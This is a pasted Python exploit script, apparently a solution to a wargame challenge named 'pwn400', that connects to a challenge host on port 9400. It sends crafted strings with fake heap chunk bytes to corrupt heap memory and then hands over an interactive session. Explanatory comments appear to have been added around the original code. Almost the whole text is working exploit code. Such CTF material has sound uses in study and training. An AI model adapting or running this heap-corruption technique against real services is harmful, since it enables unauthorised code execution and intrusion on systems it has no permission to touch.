
pwn400_2

a guest
Apr 26th, 2015
  1. #!/usr/bin/python
  2.  
  3. from Pwning import *
  4.  
class Pwn400(Payload):
    """Client script for the service at the host and port set in ``__init__``.

    ``Payload`` and ``Telnet`` come from the author's ``Pwning`` module, which
    is not part of this paste; what ``host``, ``mode`` and ``writeRawData``
    do there cannot be checked from here.
    """

    def __init__(self):
        """Set the target fields and create the connection object."""
        Payload.__init__(self)
        # Index 1 of self.host (presumably created by Payload.__init__)
        # holds the author's target host.
        self.host[1] = 'lab33.wargame.whitehat.vn'
        # Target port.
        self.port = 9400
        # 1 selects the x86 target platform (author's note).
        # NOTE(review): the author's commented-out x86_64 alternative was also
        # written as ``self.mode = 1`` -- presumably a typo; confirm against
        # the Pwning module.
        self.mode = 1
        self.conn = Telnet(self.host[1], self.port)

    def pwnTarget(self):
        """Send two rounds of two strings each, then go interactive.

        Each string is written only after the matching prompt has been read
        from the service; between the rounds the script waits for the
        'Processing' line.
        """
        # Round 1, string 1 (1024 characters). Author's note: create heap
        # with size 0x410, and free it.
        round1_first = "u#" + "A" * 1022
        # Round 1, string 2 (1024 characters).
        round1_second = "AA#" + "D" * 1021

        # Round 2, string 1: a fixed head followed by "B" fill.
        # NOTE(review): the escapes are plain str literals, so this is byte
        # data only under Python 2 -- presumably the intended interpreter.
        head = "".join([
            "o<1060>",
            "\x00\x80" * 7,
            "\x00\x88",
            "\x00\x10",
            "\x56\x01",
            "\x08\x01",
            "\x40\x01",
        ])
        # The fill length is taken from the head alone, before the two-byte
        # chunk is added, so the finished string is 1026 characters long,
        # two more than the 1024 used for the other three strings.
        round2_first = head + "\x00\x05" + "B" * (1024 - len(head))
        # Round 2, string 2 (1024 characters).
        round2_second = "B" * 1024

        # (prompt to wait for, data to send afterwards or None for no reply)
        exchange = [
            ('Input string 1\n', round1_first),
            ('Input string 2\n', round1_second),
            ('Processing\n', None),
            ('Input string 1\n', round2_first),
            ('Input string 2\n', round2_second),
        ]
        for prompt, reply in exchange:
            self.conn.read_until(prompt)
            if reply is not None:
                self.conn.writeRawData(reply)

        # Hand the session to the operator, then release the connection.
        # close() is not reached if interact() raises.
        self.conn.interact()
        self.conn.close()
  33.  
# Runs at module level with no __main__ guard: importing this file also
# builds the Pwn400 object and starts the exchange with the target.
pwn400 = Pwn400()
pwn400.pwnTarget()